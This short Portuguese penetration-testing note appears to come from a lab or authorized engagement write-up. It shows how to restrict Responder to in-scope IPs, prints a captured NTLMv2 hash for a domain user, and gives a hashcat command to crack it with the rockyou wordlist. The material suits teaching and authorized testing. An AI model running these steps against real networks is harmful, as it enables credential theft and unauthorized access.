Para capturar as senhas localmente, podemos utilizar o responder.
Podemos utilizar o responder para apenas capturar os IPS que fazem parte do escopo. Vamos acessar o arquivo abaixo a alterar a linha conforme descrito.
Copy $ nano /etc/responder/Responder.conf
RespondTo = <ip>,<ip>...
Com isso conseguimos capturar algumas hashes.
Copy [SMB] NTLMv2-SSP Client : 172.16.1.253
[SMB] NTLMv2-SSP Username : ORIONSCORP2\rlourdes
[SMB] NTLMv2-SSP Hash : rlourdes::ORIONSCORP2:ed1616c10528b2b5:7E539A4F7E1D21F9BFE9EFD122BAECF7:0101000000000000C0653150DE09D201EA60B47BD213FEC4000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000000291F2A5418CB29E0E36E16818A1A7DFA566917A35F73BA72512CF60035D13C10A001000000000000000000000000000000000000900180063006900660073002F0073006500720076006100640032000000000000000000
Podemos jogar a hash inteira num hashcat ou john para quebrar.
Copy $ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force